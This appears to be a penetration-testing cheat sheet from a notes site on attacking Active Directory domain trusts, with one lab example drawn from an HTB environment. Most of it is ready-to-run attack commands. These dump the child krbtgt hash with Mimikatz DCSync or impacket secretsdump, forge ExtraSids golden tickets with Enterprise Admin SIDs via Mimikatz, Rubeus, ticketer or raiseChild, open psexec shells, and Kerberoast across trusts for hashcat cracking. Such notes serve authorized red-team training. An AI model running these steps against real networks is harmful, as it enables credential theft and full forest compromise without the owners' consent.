Attacking Domain Trusts

ExtraSids

This attack allows for the compromise of a parent domain once the child domain has been compromised. The sidHistory attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain. An attacker can perform SID history injection (due to a lack of SID Filtering protection) and add an administrator account to the SID History attribute of an account they control in the child domain. When logging in with this account, all of the SIDs associated with the account are added to the user's token. This token is used to determine what resources the account can access.

We need:

FQDN - child domain
KRBTGT hash - child domain
SID - child domain
USER - child domain (does not need to exist)
SID Enterprise Admin group - root domain

Locally - Windows

2 - 3 with Mimikatz (Since we have compromised the child domain, we can log in as a Domain Admin or similar and perform the DCSync attack to obtain the NT hash for the KRBTGT account)

lsadump::dcsync /user:<CHILD_DOMAIN>\krbtgt
# take note of Domain SID (Security ID - Relative ID)

3 - 5 with Old or New PowerView

Get-DomainSID

Get-DomainGroup -Domain <DOMAIN> -Identity "Enterprise Admins" | select distinguishedname,objectsid

5 with cmdlet Get-ADGroup

Get-ADGroup -Identity "Enterprise Admins" -Server "<DOMAIN>"

With Mimikatz, create a Golden Ticket to access all resources within the parent domain

mimikatz.exe
> kerberos::golden /user:<NEW_USER> /domain:<FQDN_CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<HASH> /sids:<ENTERPRISE_ADMIN_SID> /ptt

check

klist
ls \\<MACHINE_DC>.<DOMAIN_ROOT>\c$

With Rubeus, create a Golden Ticket to access all resources within the parent domain

.\Rubeus.exe golden /rc4:<HASH> /domain:<FQDN_CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID>  /sids:<ENTERPRISE_ADMIN_SID> /user:<NEW_USER> /ptt

check

klist
ls \\<MACHINE_DC>.<DOMAIN_ROOT>\c$

Remotely - Linux

2 with impacket-secretsdump

secretsdump.py <FULL_CHILD_DOMAIN>/<USER>@<DC> -just-dc-user <CHILD_DOMAIN>/krbtgt
# secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

3 - 5 with impacket-lookupsid.py (bruteforce SID)

lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_CHILD> | grep "Domain SID"

lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_ROOT> | grep "Domain SID"
lookupsid.py <FULL_CHILD_DOMAIN>/<USER>@<DC_ROOT> | grep "Enterprise Admins"
# <Domain_SID>-<RID_EnterpriseAdmin>

Use impacket-ticketer.py to construct a Golden Ticket. This ticket will be valid to access resources in the child domain (specified by -domain-sid) and the parent domain (specified by -extra-sid).

ticketer.py -nthash <HASH> -domain <FULL_CHILD_DOMAIN> -domain-sid <CHILD_DOMAIN_SID> -extra-sid <ROOT_EnterpriseAdmin_SID> <NEW_USER>

Now import the ticket and use it

export KRB5CCNAME=<PATH_TO_FILE>.ccache

psexec.py <FULL_CHILD_DOMAIN>/<NEW_USER>@<MACHINE_NAME>.<DOMAIN> -k -no-pass -target-ip <MACHINE_IP>

USe raiseChild.py to automate the process

raiseChild.py -target-exec <MACHINE_IP> <FULL_CHILD_DOMAIN>/<USER_ADMIN>

Workflow

Input:

Child-domain Admin credentials (password, hashes or aesKey) in the form of 'domain/username[:password]' The domain specified MUST be the domain FQDN.
Optionally a pathname to save the generated golden ticket (-w switch)
Optionally a target-user RID to get credentials (-targetRID switch) Administrator by default.
Optionally a target to PSEXEC with the target-user privileges to (-target-exec switch). Enterprise Admin by default.

Process:

Find out where the child domain controller is located and get its info (via [MS-NRPC])
Find out what the forest FQDN is (via [MS-NRPC])
Get the forest's Enterprise Admin SID (via [MS-LSAT])
Get the child domain's krbtgt credentials (via [MS-DRSR])
Create a Golden Ticket specifying SID from 3) inside the KERB_VALIDATION_INFO's ExtraSids array and setting expiration 10 years from now
Use the generated ticket to log into the forest and get the target user info (krbtgt/admin by default)
If file was specified, save the golden ticket in ccache format
If target was specified, a PSEXEC shell is launched

Output:

Target user credentials (Forest's krbtgt/admin credentials by default)
A golden ticket saved in ccache for future fun and profit
PSExec Shell with the target-user privileges (Enterprise Admin privileges by default) at target-exec parameter.

Foreign Group Membership

We may see users or admins from Domain A as members of a group in Domain B. Only Domain Local Groups allow security principals from outside its forest. We may see a Domain Admin or Enterprise Admin from Domain A as a member of the built-in Administrators group in Domain B in a bidirectional forest trust relationship. If we can take over this admin user in Domain A, we would gain full administrative access to Domain B based on group membership.

Use the PowerView function Get-DomainForeignGroupMember

Get-DomainForeignGroupMember -Domain <DOMAIN_TARGET>
# take note of MemberName

Convert-SidToName <MemberName>

Now we can verify the access to the target domain using the Enter-PSSession cmdlet to connect over WinRM.

Enter-PSSession -ComputerName <PC_NAME>.<TARGET_DOMAIN> -Credential <OUTPUT_Convert-SidToName>

Kerberoasting

Domain with an inbound or bidirectional domain/forest trust

Enumaration SPN on the domain target with Old or New PowerView

Get-DomainUser -Domain <TARGET_DOMAIN> |select samaccountname,memberof

Kerberosting with Rubeus

.\Rubeus.exe kerberoast /domain:<TARGET_DOMAIN> /user:<SPN> /nowrap

Offline cracking of output with hashcat (-m 13100)

Enumaration SPN on the domain target with impacket-GetUserSPNs

GetUserSPNs.py -target-domain <TARGET_DOMAIN> <DOMAIN>/<USER>

Rerunning the command with the -request flag added gives us the TGS ticket.

GetUserSPNs.py -request -target-domain <TARGET_DOMAIN> <DOMAIN>/<USER> [-outputfile <OUTPUT FILE>]

Offline cracking of output with hashcat (-m 13100)

Last updated 1 month ago

Was this helpful?